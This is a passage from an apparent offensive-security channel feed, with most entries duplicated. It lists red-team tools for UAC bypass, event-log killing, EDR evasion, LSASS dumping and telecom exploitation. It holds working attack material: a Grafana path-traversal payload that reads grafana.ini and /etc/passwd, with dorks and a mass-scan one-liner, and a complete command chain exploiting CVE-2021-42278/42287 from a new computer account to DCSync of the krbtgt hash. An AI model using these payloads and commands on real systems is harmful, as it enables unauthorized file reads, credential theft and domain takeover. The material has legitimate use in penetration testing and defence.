UAC bypass - DLL hijacking
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.
https://github.com/SecuProject/DLLHijackingScanner
#uac #bypass #dll #hijacking
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.
https://github.com/SecuProject/DLLHijackingScanner
#uac #bypass #dll #hijacking
Phant0m — Windows Event Log Killer
Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.
https://github.com/hlldz/Phant0m
#windows #events #log #killer
Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.
https://github.com/hlldz/Phant0m
#windows #events #log #killer
Rodan Telecom Exploitation Framework
Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.
https://github.com/Etisalat-Egypt/Rodan
#telecom #ss7 #gtp #sip
Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.
https://github.com/Etisalat-Egypt/Rodan
#telecom #ss7 #gtp #sip
GitHub
GitHub - Etisalat-Egypt/Rodan: Rodan Exploitation Framework
Rodan Exploitation Framework. Contribute to Etisalat-Egypt/Rodan development by creating an account on GitHub.
PowerRunAsAttached
This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
Example:
https://github.com/DarkCoderSc/PowerRunAsAttached
#runas #powershell #pentest #tools
This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
Example:
Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz"https://github.com/DarkCoderSc/PowerRunAsAttached
#runas #powershell #pentest #tools
Grafana — Unauthorized Arbitrary Read File
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
Fofa.so:
ZoomEye:
PoC
The "plugin-id" could be any plugin that exists in the system
One line command to detect:
#grafana #lfi #bugbounty #pentest
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
title:"Grafana"Fofa.so:
app="Grafana"ZoomEye:
grafanaPoC
https://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.iniThe "plugin-id" could be any plugin that exists in the system
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'#grafana #lfi #bugbounty #pentest
Abusing Leaked Handles to Dump LSASS Memory
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam
Extracting passwords from hiberfil.sys
When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text.
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
#hiberfil #dump #password
When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text.
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
#hiberfil #dump #password
EDRSandBlast
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.
https://github.com/wavestone-cdt/EDRSandblast
#lsass #dump #etw #redteam
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.
https://github.com/wavestone-cdt/EDRSandblast
#lsass #dump #etw #redteam
GitHub
GitHub - wavestone-cdt/EDRSandblast
Contribute to wavestone-cdt/EDRSandblast development by creating an account on GitHub.
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
MAL-CL — Malicious Command-Line
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
Process Ghosting — EDR Evasion
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
Pentest Laboratories
Process Ghosting
Understanding how endpoint products work to identify malicious actions can lead to the discovery of security gaps which can be used for evasion during red team operations. The technique Process Her…
ipsourcebypass
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
Example Reports
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
GitHub
GitHub - globalcptc/report_examples: Example reports from prior years of the Collegiate Penetration Testing Competition
Example reports from prior years of the Collegiate Penetration Testing Competition - globalcptc/report_examples
Log4j RCE — CVE-2021-44228
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
ldapconsole
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
GitHub
GitHub - p0dalirius/ldapconsole: The ldapconsole script allows you to perform custom LDAP requests to a Windows domain.
The ldapconsole script allows you to perform custom LDAP requests to a Windows domain. - p0dalirius/ldapconsole
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNsaddspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGTgetTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer namerenameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Bbtain a service ticket with S4U2self by presenting the previous TGTKRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticketKRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam